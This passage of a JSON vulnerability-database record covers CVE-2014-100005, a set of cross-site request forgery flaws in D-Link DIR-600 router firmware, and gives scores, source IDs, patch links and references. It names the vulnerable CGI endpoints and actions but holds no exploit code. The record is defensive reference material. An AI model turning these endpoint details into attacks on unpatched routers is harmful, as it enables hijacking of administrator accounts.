"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2014-01581",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-68501",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-100005",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-01581",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201403-571",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-68501",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link DIR-600 router (rev. Bx) with firmware before 2.17b02 allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator account or (2) enable remote management via a crafted configuration module to hedwig.cgi, (3) activate new configuration settings via a SETCFG,SAVE,ACTIVATE action to pigwidgeon.cgi, or (4) send a ping via a ping action to diagnostic.php. D-Link DIR-600 router (rev. (2) hedwig.cgi Remote administration can be enabled via a crafted configuration module. The D-Link DIR-600 is a wireless routing device. Because the program allows users to perform certain operations through unauthenticated HTTP requests, an attacker can exploit the vulnerability to modify the configuration when a logged-in administrative user accesses a specially crafted web page. \nExploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. D-Link DIR-600 is a SOHO wireless router product of D-Link",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-100005"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "VULHUB",
"id": "VHN-68501"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-100005",
"trust": 3.3
},
{
"db": "SECUNIA",
"id": "57304",
"trust": 2.3
},
{
"db": "DLINK",
"id": "SAP10018",
"trust": 2.0
},
{
"db": "BID",
"id": "66092",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-01581",
"trust": 0.6
},
{
"db": "XF",
"id": "91794",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-89342",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-68501",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"id": "VAR-201501-0347",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
}
],
"trust": 1.5148148
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
}
]
},
"last_update_date": "2024-06-02T22:46:13.922000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP10018",
"trust": 0.8,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10018"
},
{
"title": "DIR-600_REVB_FIRMWARE_2.17.B02",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=57137"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.1
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "http://resources.infosecinstitute.com/csrf-unauthorized-remote-admin-access/"
},
{
"trust": 2.0,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10018"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/57304"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91794"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-100005"
},
{
"trust": 0.8,
"url": "https://cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/57304/"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/91794"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/66092"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "VULHUB",
"id": "VHN-68501"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"date": "2015-01-13T00:00:00",
"db": "VULHUB",
"id": "VHN-68501"
},
{
"date": "2014-03-10T00:00:00",
"db": "BID",
"id": "66092"
},
{
"date": "2015-01-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"date": "2014-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"date": "2015-01-13T11:59:04.477000",
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-68501"
},
{
"date": "2014-03-10T00:00:00",
"db": "BID",
"id": "66092"
},
{
"date": "2024-05-31T06:43:00",
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"date": "2015-01-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"date": "2024-05-18T01:00:01.410000",
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DIR-600\u00a0 Cross-site request forgery vulnerability in router firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
}
],
"trust": 0.6
}
}